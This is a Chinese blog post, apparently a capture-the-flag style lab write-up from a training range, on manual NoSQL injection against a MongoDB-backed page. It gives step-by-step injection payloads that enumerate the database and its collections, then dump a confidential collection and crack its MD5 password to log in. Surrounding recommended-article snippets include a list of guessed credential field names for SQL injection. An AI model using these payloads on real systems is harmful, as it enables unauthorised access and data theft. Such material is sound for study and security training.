MongoDB⼿⼯注⼊

于 2024-08-20 20:12:30 发布
阅读量62 收藏 2
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kknifek/article/details/141367306
版权
步骤⼀:构造回显测试
?id=1'});return ({title:'1',content:'2
步骤⼆: 成功显示“1”和“2”。可以在此来显示想要查询的数据。接下来开始尝试构造payload查询
当前数据库。通过回显观察到数据库为 mozhe_cms_Authority 其中tojson是可以把数据变成
json型数据,db为取当前数据库,即当前的数据库为 mozhe_cms_Authority
?id=1'});return({title:tojson(db),content:'2

步骤三:得到数据库名之后就可以尝试爆出数据库下的表名了且构造Payload...其中 db.getColl ectionNames() 返回⼀个包含当前数据库中所有集合名称的数组。

?id=1'});return({title:tojson(db.getCollectionNames()),content:'2

 

步骤四: 这样数据库的表名就被爆出来了,⼀共有三个表,分别为: Authority_confidential notice system_indexes 。最后我们就可以直接选取某个表爆出其中的数据了...
?id=1'});return({title:tojson(db.Authority_confidential.find() [ 0 ] ),content:'2
步骤五: 最终我们就可以获得数据了,将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下
端就可以看到KEY了。
桶将军T
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mongodb7.0.0安装包
09-04
MongoDB是一款开源、高性能、无模式的分布式文档型数据库,被广泛应用于Web应用程序、内容管理系统、数据存储等场景。此“mongodb7.0.0安装包”是针对Windows 64位操作系统的一个版本,适用于需要在Windows环境中...
mongodb 4.4.19
11-14
mongodb-org-4.4.19-1.el7.x86_64.rpm mongodb-org-mongos-4.4.19-1.el7.x86_64.rpm mongodb-org-server-4.4.19-1.el7.x86_64.rpm mongodb-org-shell-4.4.19-1.el7.x86_64.rpm mongodb-org-tools-4.4.19-1.el7.x86_...
墨者学院-MongoDB⼿
2301_82061181的博客
08-20 80
墨者学院-MongoDB⼿
第 4-7 课:Spring Boot 简单集成 MongoDB
qq_34227896的博客
01-09 7511
MongoDB 如今是最流⾏的 NoSQL 数据库,被⼴泛应⽤于各⾏各业中,很多创业公司数据库选型就直接使⽤ 了 MongoDB,但对于⼤部分公司,使⽤ MongoDB 的场景是做⼤规模数据查询和离线分析。MongoDB ⼀经 推出就受到了⼴⼤社区的热爱,可以说是对程序员最友好的⼀种数据库,下⾯我们来了解⼀下它的特性。 MongoDB 简介 MongoDB(Humongous,庞⼤)...
墨者学院靶场通过攻略
2301_81881972的博客
08-20 275
3.回显报错,说明"and 1=2"语句拼接到了后端数据库查询语句当中。2.点击后出现这个页面看见上面有?id=1我们来判断这个入点。
各种数据库
最新发布
2301_78031880的博客
08-20 393
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。
mongodb-测试数据
06-09
MongoDB是一种流行的开源、分布式文档数据库,常被用于构建高性能、可扩展的应用程序。这个“mongodb-测试数据”压缩包显然包含了一些用于测试MongoDB功能的样例数据集,特别是针对增、删、改、查(CRUD)操作的学习...
MongoDB4.2.21 Linux版本安装包
07-23
MongoDB是一款高性能、无模式的分布式文档型数据库,被广泛应用于大数据分析、内容管理系统、物联网(IoT)、实时应用程序和地理位置数据存储等场景。在Linux环境下安装MongoDB 4.2.21版本,是许多系统管理员和开发者...
mongodb4.4.6安装包
06-24
MongoDB是一款开源、分布式、高性能的NoSQL数据库,以其灵活性、可扩展性和高可用性而备受开发者喜爱。本文将详细讲解MongoDB 4.4.6版本的安装过程,适用于Windows和CentOS 7.0操作系统。 首先,我们来看MongoDB ...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 275
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
HAN_789的博客
08-19 117
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 463
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 405
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
weixin_43213064的博客
08-16 1109
【代码】springboot旅游网站
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 630
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 507
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
企业架构MySQL读写分离
A1357924680_的博客
08-16 835
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
实训day21
2201_75673097的博客
08-17 821
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值